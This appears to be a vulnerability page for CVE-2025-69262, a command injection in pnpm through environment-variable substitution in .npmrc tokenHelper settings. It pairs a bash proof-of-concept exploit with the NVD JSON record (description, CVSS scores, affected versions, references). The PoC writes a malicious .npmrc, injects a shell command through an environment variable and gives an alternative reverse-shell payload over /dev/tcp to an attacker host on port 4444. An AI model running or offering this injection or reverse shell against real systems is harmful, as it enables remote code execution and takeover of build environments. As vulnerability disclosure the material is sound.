CVE-2025-69262

#!/bin/bash # CVE-2025-69262 PoC - pnpm Command Injection via .npmrc tokenHelper # This PoC demonstrates how an attacker can achieve RCE by controlling environment variables # Setup: Create a malicious .npmrc file with tokenHelper cat > .npmrc << 'EOF' tokenHelper=${PNPM_TOKEN_HELPER} EOF # Attack: Set malicious environment variable containing command injection payload export PNPM_TOKEN_HELPER='; whoami > /tmp/pwned.txt; echo "' # When pnpm tries to use tokenHelper, it will execute: # Original: ${PNPM_TOKEN_HELPER} # After expansion: ; whoami > /tmp/pwned.txt; echo " # This results in arbitrary command execution # Trigger pnpm operation export PNPM_HOME="$(whoami)" pnpm install # Alternative payload for reverse shell: export PNPM_TOKEN_HELPER='; bash -i >& /dev/tcp/attacker/4444 0>&1; echo "'

{"cve": {"id": "CVE-2025-69262", "sourceIdentifier": "[email protected]", "published": "2026-01-07T23:15:50.330", "lastModified": "2026-01-12T21:50:45.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pnpm is a package manager. Versions 6.25.0 through 10.26.2 have a Command Injection vulnerability when using environment variable substitution in .npmrc configuration files with tokenHelper settings. An attacker who can control environment variables during pnpm operations could achieve Remote Code Execution (RCE) in build environments. This issue is fixed in version 10.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pnpm:pnpm:*:*:*:*:*:*:node.js:*", "versionStartIncluding": "6.25.0", "versionEndExcluding": "10.27.0", "matchCriteriaId": "CA432522-59B0-4DD7-AB6E-AE3D30B63EDC"}]}]}], "references": [{"url": "https://github.com/pnpm/pnpm/releases/tag/v10.27.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-2phv-j68v-wwqx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}